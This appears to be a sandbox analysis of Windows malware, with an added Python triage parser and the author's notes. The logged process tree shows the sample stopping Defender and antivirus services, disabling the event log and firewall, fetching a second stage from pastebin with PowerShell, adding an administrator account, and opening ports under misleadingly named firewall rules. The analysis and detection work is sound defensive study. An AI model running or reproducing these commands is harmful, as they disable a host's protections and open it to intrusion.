    C:\Windows\system32\scrnsave.scr  |  C:\Windows\system32\scrnsave.scr /s  |  level 3  |  109 instances, PIDs in order: 2572, 3980, 3996, 2828, 1912, 3344, 3684, 4736, 2776, 2928, 1472, 4188, 3496, 4312, 796, 1780, 2008, 4336, 2416, 2476, 5032, 2140, 2832, 1868, 3704, 2188, 4576, 4188, 1328, 3124, 2844, 1496, 3788, 1932, 2780, 784, 2140, 3116, 3220, 4968, 3324, 1888, 1416, 1724, 4420, 2732, 796, 864, 3428, 3768, 4712, 4360, 5088, 2736, 2244, 5108, 676, 2292, 2320, 1368, 4520, 888, 4592, 1776, 3192, 3808, 1176, 4980, 444, 3688, 1456, 4660, 2928, 2000, 4200, 4352, 3476, 1488, 4868, 2068, 1744, 2200, 1480, 4060, 1004, 4804, 1032, 4672, 3168, 2632, 4784, 1072, 3976, 3324, 1824, 4200, 3148, 2068, 4156, 4060, 4772, 1496, 2540, 1368, 2468, 4784, 1176, 4328, 3004
C:\Windows\system32\net.exe  |  net stop "WinDefend"  |  level 2  |  PID 3180  |  Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "WinDefend"  |  level 3  |  PID 4900
C:\Windows\system32\taskkill.exe  |  taskkill /f /t /im "MSASCui.exe"  |  level 2  |  PID 4848  |  Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
C:\Windows\system32\net.exe  |  net stop "wuauserv"  |  level 2  |  PID 1816  |  Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "wuauserv"  |  level 3  |  PID 2832
C:\Windows\system32\net.exe  |  net stop "security center"  |  level 2  |  PID 3624  |  Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop "security center"  |  level 3  |  PID 4980
C:\Windows\system32\net.exe  |  net stop sharedaccess  |  level 2  |  PID 444  |  Suspicious use of WriteProcessMemory
    C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 stop sharedaccess  |  level 3  |  PID 1868
C:\Windows\system32\netsh.exe  |  netsh firewall set opmode mode-disable  |  level 2  |  PID 4056
The following entries all share one shape: a level-2 C:\Windows\system32\net.exe running the command line shown, and its level-3 child C:\Windows\system32\net1.exe running the same command line with C:\Windows\system32\net1 in place of net. Each row gives the command line, the net.exe PID, the net1.exe PID and any signature raised on the pair.
net stop "Security Center" /y  |  net.exe PID 4116  |  net1.exe PID 1964
net stop "Automatic Updates" /y  |  net.exe PID 3668  |  net1.exe PID 4932
net stop "Symantec Core LC" /y  |  net.exe PID 5012  |  net1.exe PID 4112
net stop "SAVScan" /y  |  net.exe PID 4652  |  net1.exe PID 2652
net stop "norton AntiVirus Firewall Monitor Service" /y  |  net.exe PID 4756  |  net1.exe PID 4492
net stop "norton AntiVirus Auto-Protect Service" /y  |  net.exe PID 3676  |  net1.exe PID 2348
net stop "norton AntiVirus Auto Protect Service" /y  |  net.exe PID 112  |  net1.exe PID 4260
net stop "McAfee Spamkiller Server" /y  |  net.exe PID 3544  |  net1.exe PID 1032
net stop "McAfee Personal Firewall Service" /y  |  net.exe PID 2464  |  net1.exe PID 1904
net stop "McAfee SecurityCenter Update Manager" /y  |  net.exe PID 756  |  net1.exe PID 1368
net stop "Symantec SPBBCSvc" /y  |  net.exe PID 784  |  net1.exe PID 228
net stop "Ahnlab Task Scheduler" /y  |  net.exe PID 1116  |  net1.exe PID 5036
net stop navapsvc /y  |  net.exe PID 1636  |  net1.exe PID 2020
net stop "Sygate Personal Firewall Pro" /y  |  net.exe PID 1048  |  net1.exe PID 3116
net stop vrmonsvc /y  |  net.exe PID 4980  |  net1.exe PID 1616
net stop MonSvcNT /y  |  net.exe PID 3688  |  net1.exe PID 2672
net stop SAVScan /y  |  net.exe PID 4256  |  net1.exe PID 1912
net stop NProtectService /y  |  net.exe PID 3344  |  net1.exe PID 3184
net stop ccSetMGR /y  |  net.exe PID 4736  |  net1.exe PID 1888
net stop ccEvtMGR /y  |  net.exe PID 2340  |  net1.exe PID 2256
net stop srservice /y  |  net.exe PID 4324  |  net1.exe PID 1384
net stop "Symantec Network Drivers Service" /y  |  net.exe PID 2964  |  net1.exe PID 1316
net stop "norton Unerase Protection" /y  |  net.exe PID 3404  |  net1.exe PID 3088
net stop MskService /y  |  net.exe PID 5000  |  net1.exe PID 796
net stop MpfService /y  |  net.exe PID 128  |  net1.exe PID 1468
net stop mcupdmgr.exe /y  |  net.exe PID 4356  |  net1.exe PID 4056
net stop "McAfeeAntiSpyware" /y  |  net.exe PID 2652  |  net1.exe PID 1004
net stop helpsvc /y  |  net.exe PID 4880  |  net1.exe PID 4804
net stop ERSvc /y  |  net.exe PID 3392  |  net1.exe PID 3676
net stop "*norton*" /y  |  net.exe PID 4260  |  net1.exe PID 1460
net stop "*Symantec*" /y  |  net.exe PID 3364  |  net1.exe PID 3584
net stop "*McAfee*" /y  |  net.exe PID 1904  |  net1.exe PID 4088
net stop ccPwdSvc /y  |  net.exe PID 2136  |  net1.exe PID 1224
net stop "Symantec Core LC" /y  |  net.exe PID 4632  |  net1.exe PID 5032
net stop navapsvc /y  |  net.exe PID 1116  |  net1.exe PID 3036
net stop "Serv-U" /y  |  net.exe PID 3028  |  net1.exe PID 3612
net stop "norton AntiVirus Auto Protect Service" /y  |  net.exe PID 1616  |  net1.exe PID 1176
net stop "norton AntiVirus Client" /y  |  net.exe PID 5004  |  net1.exe PID 1868
net stop "Symantec AntiVirus Client" /y  |  net.exe PID 3596  |  net1.exe PID 3620
net stop "norton AntiVirus Server" /y  |  net.exe PID 656  |  net1.exe PID 3084
net stop "NAV Alert" /y  |  net.exe PID 2280  |  net1.exe PID 4644
net stop "Nav Auto-Protect" /y  |  net.exe PID 3936  |  net1.exe PID 4200
net stop "McShield" /y  |  net.exe PID 3148  |  net1.exe PID 4476
net stop "DefWatch" /y  |  net.exe PID 2960  |  net1.exe PID 4868
net stop eventlog /y  |  net.exe PID 2396  |  net1.exe PID 3668
net stop InoRPC /y  |  net.exe PID 4424  |  net1.exe PID 4492
net stop InoRT /y  |  net.exe PID 3608  |  net1.exe PID 3396
net stop InoTask /y  |  net.exe PID 1388  |  net1.exe PID 4132
net stop "norton AntiVirus Auto Protect Service" /y  |  net.exe PID 2588  |  net1.exe PID 1932
net stop "norton AntiVirus Client" /y  |  net.exe PID 228  |  net1.exe PID 3852
net stop "norton AntiVirus Corporate Edition" /y  |  net.exe PID 4024  |  net1.exe PID 2392
net stop "ViRobot Professional Monitoring" /y  |  net.exe PID 1984  |  net1.exe PID 3980
net stop "PC-cillin Personal Firewall" /y  |  net.exe PID 5068  |  net1.exe PID 1096
net stop "Trend Micro Proxy Service" /y  |  net.exe PID 3192  |  net1.exe PID 1048
net stop "Trend NT Realtime Service" /y  |  net.exe PID 3116  |  net1.exe PID 1176  |  System Time Discovery (both)
net stop "McAfee.com McShield" /y  |  net.exe PID 1532  |  net1.exe PID 4328
net stop "McAfee.com VirusScan Online Realtime Engine" /y  |  net.exe PID 3216  |  net1.exe PID 4092  |  System Time Discovery (both)
net stop "SyGateService" /y  |  net.exe PID 3596  |  net1.exe PID 3184
net stop "Sygate Personal Firewall Pro" /y  |  net.exe PID 4660  |  net1.exe PID 2896
net stop "Sophos Anti-Virus" /y  |  net.exe PID 2344  |  net1.exe PID 1876
net stop "Sophos Anti-Virus Network" /y  |  net.exe PID 4576  |  net1.exe PID 4800
net stop "eTrust Antivirus Job Server" /y  |  net.exe PID 1724  |  net1.exe PID 4188
net stop "eTrust Antivirus Realtime Server" /y  |  net.exe PID 840  |  net1.exe PID 1488  |  System Time Discovery (both)
net stop "Sygate Personal Firewall Pro" /y  |  net.exe PID 4868  |  net1.exe PID 260
net stop "eTrust Antivirus RPC Server" /y  |  net.exe PID 1740  |  net1.exe PID 1732
net stop netsvcs  |  net.exe PID 1588  |  net1.exe PID 4176
net stop spoolnt  |  net.exe PID 3932  |  net1.exe PID 3428
-
C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /K black.bat  |  level 2  |  PID 1124
    C:\Windows\System32\Conhost.exe  |  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  |  level 3  |  PID 3668
    C:\Windows\system32\scrnsave.scr  |  C:\Windows\system32\scrnsave.scr /s  |  level 3  |  7 instances, PIDs in order: 4756, 1032, 4672, 2780, 5032, 3192, 1532
C:\Windows\system32\rundll32.exe  |  RUNDLL32 USER32.DLL SwapMouseButton  |  level 2  |  PID 4016
C:\Windows\system32\tskill.exe  |  tskill iexplore  |  level 2  |  PID 4424  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill msnmsgr  |  level 2  |  PID 3676  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill excel  |  level 2  |  PID 2156  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill iTunes  |  level 2  |  PID 4132  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill calc  |  level 2  |  PID 2332  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill msaccess  |  level 2  |  PID 1932  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill safari  |  level 2  |  PID 1516  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill mspaint  |  level 2  |  PID 1224  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill outlook  |  level 2  |  PID 1160  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill WINWORD  |  level 2  |  PID 3764  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill msnmsgr  |  level 2  |  PID 1996  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill firefox  |  level 2  |  PID 4936  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\tskill.exe  |  tskill LimreWire  |  level 2  |  PID 4904  |  Suspicious behavior: EnumeratesProcesses
C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /K 2b2crypt.cmd  |  level 2  |  PID 568
    C:\Windows\System32\Conhost.exe  |  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1  |  level 3  |  PID 3676
C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /K 2b2crypt.m.cmd  |  level 2  |  PID 3392
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  powershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"  |  level 2  |  PID 1748  |  Blocklisted process makes network request; Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
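The parts of this tree worth extracting automatically are the defence-evasion run above (the `net stop` calls against WinDefend, Security Center, sharedaccess, wuauserv, eventlog and a long list of third-party AV service names, plus the legacy `netsh firewall set opmode` call), the PowerShell fetch of a second stage from pastebin just above, and, in the FuckPorts.cmd subtree that follows, the execution-policy change, the `session` account added to the local Administrators group, and `netsh advfirewall` rules whose display name says "UDP Port 24215" while `localport` actually opens inbound 14541 (and "UDP Port 12640" for outbound 29303). The Python below is an added example, not part of the sandbox output or of the sample: it parses this report's flattened line format (image path run straight into the command line, the depth digit fused onto the command line's tail, then `⤵`, optional signature bullets and `PID:`), rebuilds parent/child links from the depth, and flags those patterns. The SAMPLE lines are constructed from entries on this page; the depth-1 root line, the SECURITY_SERVICES set and the AV_WORDS fragments are the author's assumptions.

```python
"""Triage helper for the flattened process-tree lines in this report (added example,
not sandbox output).  A line reads <image path><command line><depth>⤵PID:<n>, with
optional '- <signature>' lines between the arrow and the PID.  The image path runs
straight into the command line and the depth digit is fused onto its end, so the parser
peels exactly one trailing digit off.  SAMPLE is constructed from entries on this page;
the depth-1 root line, SECURITY_SERVICES and AV_WORDS are the author's assumptions."""
import re
from dataclasses import dataclass, field

HEADER = re.compile(r"^(?P<path>[A-Za-z]:\\.*?\.(?:exe|scr))(?P<cmd>.*)(?P<depth>\d)⤵(?P<rest>.*)$")
PID_RE = re.compile(r"PID:(\d+)")
SECURITY_SERVICES = {"windefend", "security center", "wscsvc", "wuauserv", "sharedaccess", "mpssvc", "eventlog", "srservice"}  # assumed
AV_WORDS = ("norton", "symantec", "mcafee", "antivirus", "anti-virus", "firewall",
            "sophos", "trend", "etrust", "mcshield", "navapsvc", "defwatch")  # assumed


@dataclass
class Proc:
    path: str
    cmd: str
    depth: int
    pid: int = -1
    tags: list = field(default_factory=list)
    parent: "Proc | None" = None


def parse_tree(lines):
    """Rebuild parent/child links from the depth digit.  PIDs recur in the report
    because short-lived processes free them, so the tree is keyed on position, not PID."""
    procs, last_at_depth, cur = [], {}, None
    for raw in lines:
        line = raw.strip()
        if not line or line == "-":            # empty bullets between entries
            continue
        if m := HEADER.match(line):
            cur = Proc(m["path"], m["cmd"].strip(), int(m["depth"]))
            cur.parent = last_at_depth.get(cur.depth - 1)
            last_at_depth[cur.depth] = cur
            procs.append(cur)
            line = m["rest"]                   # the PID may sit on the same line
        if cur is None:
            continue
        if line.startswith("- "):
            cur.tags.append(line[2:])
        if p := PID_RE.search(line):
            cur.pid = int(p.group(1))
    return procs


def ancestry(proc):
    """Image basenames from the root down to this process."""
    chain = []
    while proc is not None:
        chain.append(proc.path.rsplit("\\", 1)[-1])
        proc = proc.parent
    return chain[::-1]


def analyse(proc):
    """Findings for one command line: defence evasion, download cradle, privilege grant."""
    c, low, out = proc.cmd, proc.cmd.lower(), []
    if m := re.search(r'(?:^|\\)net1?\s+stop\s+"?(.+?)"?(?:\s+/y)?\s*$', c, re.I):
        svc = m.group(1)
        if svc.lower() in SECURITY_SERVICES or any(w in svc.lower() for w in AV_WORDS):
            out.append(f"stops security service '{svc}'")
        if "*" in svc:   # net.exe does not expand wildcards: the call fails, the intent is visible
            out.append("wildcard service name (net stop rejects it)")
    if re.search(r"netsh\s+firewall\s+set\s+opmode", low):
        out.append("disables firewall through the legacy 'netsh firewall' context")
    if m := re.search(r'advfirewall\s+firewall\s+add\s+rule\s+name="([^"]+)"(.*)', c, re.I):
        name, args = m.groups()
        port, named = re.search(r"localport=(\d+)", args, re.I), re.search(r"\d+", name)
        desc = f"adds firewall rule '{name}'"
        if port and named and int(named.group()) != int(port.group(1)):
            desc += f": name advertises port {named.group()} but localport is {port.group(1)}"
        out.append(desc)
    if re.search(r"invoke-webrequest|downloadstring|downloadfile|start-bitstransfer|certutil", low):
        url = re.search(r"https?://\S+", c)
        out.append(f"download cradle -> {url.group() if url else 'no URL on command line'}")
    if "set-executionpolicy" in low and "unrestricted" in low:
        out.append("sets PowerShell execution policy to Unrestricted")
    if m := re.search(r"net1?\s+localgroup\s+administrators\s+(\S+)\s+/add", low):
        out.append(f"adds '{m.group(1)}' to local Administrators")
    return out


def triage(lines):
    """(pid, 'root > ... > image', finding) for every flagged process in the report."""
    return [(p.pid, " > ".join(ancestry(p)), f) for p in parse_tree(lines) for f in analyse(p)]


# Constructed from entries on this page; the depth-1 root line is assumed.
SAMPLE = r"""
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c YourCyanide.cmd1⤵PID:1000
C:\Windows\system32\net.exenet stop "WinDefend"2⤵
- Suspicious use of WriteProcessMemory
PID:3180 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WinDefend"3⤵PID:4900
C:\Windows\system32\net.exenet stop "*norton*" /y2⤵PID:4260
C:\Windows\system32\netsh.exenetsh firewall set opmode mode-disable2⤵PID:4056
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K black.bat2⤵PID:2124
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s3⤵PID:4932
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest https://pastebin.com/raw/2K5m42Xp -outfile ycynlog.cmd"2⤵PID:1748
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:4784
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵PID:3652
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:2476
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2584
""".strip().splitlines()

if __name__ == "__main__":
    for pid, chain, finding in triage(SAMPLE):
        print(f"PID {pid:>5}  {chain:<32}  {finding}")
```

Points to keep in mind when reading the findings against this report. PIDs such as 3768, 4024 and 4988 appear several times in the tree because short-lived processes free them and Windows hands them out again, so the parser keys parent/child links on report position and not on PID. Most of the service names the script stops (Symantec Core LC, SAVScan, Sygate, ccEvtMGR, InoRT and the rest) belong to 2000s-era products that do not exist on a Windows 11 image, and `net stop` rejects the `*norton*`-style wildcards outright, so the calls that matter on this platform are the ones against WinDefend (which current builds refuse to stop with "Access is denied" in any case), Security Center, sharedaccess, wuauserv and eventlog. The "System Time Discovery" signature attaches only to entries whose service name contains "Realtime", and "Event Triggered Execution: Netsh Helper DLL" to plain `add rule` calls that register no helper; both are command-line keyword hits by the sandbox rather than the behaviour named. The `mode-disable` spelling is not a valid value for the legacy `set opmode` command (the documented form is `mode=disable`), so that call fails, while the `advfirewall` rules with the misleading names do take effect.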
C:\Windows\system32\cmd.exe  |  C:\Windows\system32\cmd.exe /K FuckPorts.cmd  |  level 2  |  PID 4784
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  |  powershell -command "Set-ExecutionPolicy Unrestricted"  |  level 3  |  PID 3652  |  Command and Scripting Interpreter: PowerShell; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    C:\Windows\system32\net.exe  |  net localgroup administrators session /ADD  |  level 3  |  PID 2476
        C:\Windows\system32\net1.exe  |  C:\Windows\system32\net1 localgroup administrators session /ADD  |  level 4  |  PID 2320
    C:\Windows\system32\netsh.exe  |  netsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=14541  |  level 3  |  28 instances so far, issued alternately with the outbound rule below, PIDs in order: 2584, 1964, 1160, 1984, 3500, 2844, 4336, 5036, 864, 916, 2540, 2260, 4988, 3584, 428, 1888, 1224, 1468, 2316, 228, 5036, 1740, 3088, 1420, 656, 1588, 4176, 2008  |  Modifies Windows Firewall on PIDs 2584, 2844, 916, 4988, 1588; Event Triggered Execution: Netsh Helper DLL on PIDs 2584, 2540, 1468, 228
    C:\Windows\system32\netsh.exe  |  netsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=29303  |  level 3  |  27 instances so far, PIDs in order: 864, 2188, 2464, 3324, 3932, 4352, 4024, 4736, 1740, 2416, 2112, 4440, 4060, 4024, 3324, 4988, 2112, 3944, 1368, 1920, 3456, 896, 676, 3804, 3960, 4348, 2896  |  Modifies Windows Firewall on PIDs 4024, 3456, 4348; Event Triggered Execution: Netsh Helper DLL on PIDs 864, 4352, 4024, 4736, 4440, 1368, 3804
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4900
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2344
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3944
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1388
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1744
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3820
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:1420
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1644
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3944
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K FuckPorts.cmd2⤵PID:2832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Set-ExecutionPolicy Unrestricted"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3620
-
-
C:\Windows\system32\net.exenet localgroup administrators session /ADD3⤵PID:1260
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators session /ADD4⤵PID:3584
-
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3612
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3456
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4452
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4360
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:912
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1904
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:4348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2896
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2352
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:3532
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:3104
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2172
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1576
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:2632
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:2068
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:892
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1328
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
PID:260
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2476
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:888
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:5036
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:1412
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:4440
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1384
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:2796
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2528
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:3688
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:248
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1928
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Modifies Windows Firewall
PID:1876
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4736
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:1460
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3640
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵
- Event Triggered Execution: Netsh Helper DLL
PID:3168
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 12640" dir=out action=allow protocol=UDP localport=293033⤵PID:4500
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 24215" dir=in action=allow protocol=UDP localport=145413⤵PID:4844
-
-
